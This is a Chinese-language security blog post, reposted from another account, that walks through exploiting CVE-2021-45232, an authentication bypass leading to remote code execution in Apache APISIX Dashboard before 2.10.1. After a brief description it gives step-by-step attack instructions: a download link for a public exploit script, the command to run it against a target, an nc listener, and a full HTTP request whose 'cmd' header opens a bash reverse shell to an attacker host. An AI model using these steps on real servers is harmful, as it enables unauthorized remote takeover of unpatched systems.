CVE-2021-45232 Apache APISIX Dashboard RCE

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 CVE-2021-45232 Apache APISIX Dashboard RCE

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

在2.10.1之前的apache apisix Dashboard中,Manager API使用了两个框架,并在框架‘gin’的基础上引入了框架‘droplet’,所有的API和认证中间件都是基于框架‘droplet’开发的,但有些API直接使用框架‘gin’的接口,从而绕过了认证进而可导致远程代码执行。

图片[1]-CVE-2021-45232 Apache APISIX Dashboard RCE-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

洞影响: 

apache: 2.7.0 < APISIX Dashboard< 2.10.1

1.使用漏洞利用脚本,进行攻击


1.下载脚本:
http://github.com/wuppp/apisix_dashboard_rce

2.漏洞利用:
python apisix_dashboard_rce.py http://x.x.x.x:9000/
图片[2]-CVE-2021-45232 Apache APISIX Dashboard RCE-渗透云记 - 专注于网络安全与技术分享

2.nc监听,反弹shell

1.nc监听:
nc -lvnp 7777

2.反弹shell
GET /yoDwcM HTTP/1.1
Host: x.x.x.x:9080
cmd: bash -c 'exec bash -i &>/dev/tcp/x.x.x.x/7777 <&1'
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
图片[3]-CVE-2021-45232 Apache APISIX Dashboard RCE-渗透云记 - 专注于网络安全与技术分享
© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容